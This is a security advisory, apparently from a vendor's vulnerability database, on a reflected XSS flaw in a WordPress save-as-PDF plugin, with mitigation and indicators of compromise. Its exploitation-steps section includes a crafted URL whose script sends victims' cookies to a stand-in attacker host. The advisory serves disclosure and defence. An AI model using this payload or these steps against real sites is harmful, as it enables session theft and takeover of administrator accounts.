CVE-2026-0862
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-0862 is a Reflected Cross-Site Scripting (XSS) vulnerability in the "Save as PDF Plugin by PDFCrowd" for WordPress, affecting all versions up to and including 4.5.5. The flaw arises from insufficient input sanitization and output escaping of the options parameter, allowing unauthenticated attackers to inject arbitrary web scripts. Exploitation requires that the PDFCrowd API key is blank ("demo mode," the default installation configuration) or known to the attacker. It was published on January 24, 2026, with Wordfence as the assigning CNA, and carries a CVSS v3.1 base score of 6.1 (Medium) (Wordfence, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the reflected type. The options parameter passed to the plugin is not properly sanitized before being rendered in the HTTP response, enabling injection of arbitrary JavaScript. Because the plugin's default installation state leaves the PDFCrowd API key blank (demo mode), the attack surface is broad for newly installed or misconfigured instances. The patch was committed to the WordPress plugin repository at changeset 3438577 (WordPress Trac, Wordfence).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session cookie theft, credential harvesting, phishing page injection, or redirection to malicious sites. The confidentiality and integrity impacts are rated low (limited to browser-context data), and there is no direct availability impact; however, chained with other vulnerabilities, it could facilitate account takeover of authenticated users including administrators (Wordfence, Red Hat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-0862 as of the available data. The EPSS score is approximately 0.055%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering — tricking an authenticated user into clicking a crafted link — and is further constrained by the requirement that the API key be blank or known (Wordfence, Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the "Save as PDF Plugin by PDFCrowd" at version 4.5.5 or earlier, particularly those in default/demo mode (API key blank). Tools like WPScan or Shodan can assist in fingerprinting plugin versions.
  2. Confirm demo mode: Verify that the target site has no PDFCrowd API key configured (default installation state), which is required for exploitation.
  3. Craft malicious URL: Construct a URL targeting the vulnerable plugin endpoint that includes a malicious payload in the options parameter, e.g., https://target-site.com/?pdfcrowd_options=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver the link: Send the crafted URL to a target user (e.g., a WordPress administrator) via email, social media, or another channel, enticing them to click it.
  5. Script execution: When the victim clicks the link and loads the page, the injected script executes in their browser, potentially exfiltrating session cookies or performing actions on their behalf (Wordfence).

Indicators of compromise

  • Network: Outbound requests from victim browsers to unexpected external domains shortly after loading a WordPress page with the PDFCrowd plugin; unusual referrer headers in web server logs pointing to crafted URLs containing options parameter with encoded script tags.
  • Logs: WordPress or web server access logs showing GET/POST requests to plugin-related endpoints with URL-encoded <script> tags or JavaScript event handlers in the options parameter (e.g., options=%3Cscript%3E...%3C%2Fscript%3E).
  • Browser/Client: Users reporting unexpected redirects or pop-ups after clicking links to the WordPress site; browser developer tools showing script execution from unexpected inline sources on PDF-related pages.

Mitigation and workarounds

Site administrators should update the "Save as PDF Plugin by PDFCrowd" to version 4.5.6 or later, which includes the fix committed in changeset 3438577 (WordPress Trac). As an interim workaround, configuring a valid PDFCrowd API key (exiting demo mode) removes the primary precondition for exploitation. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules can help block crafted requests targeting the options parameter.

Community reactions

Wordfence included CVE-2026-0862 in their weekly WordPress vulnerability report for January 19–25, 2026, noting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence Blog). The vulnerability was also tracked by INCIBE-CERT and several vulnerability aggregation platforms shortly after disclosure, indicating routine community monitoring without significant alarm given the medium severity rating (Red Hat CVE).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NoYesAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NoYesAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NoYesAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NoYesAug 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management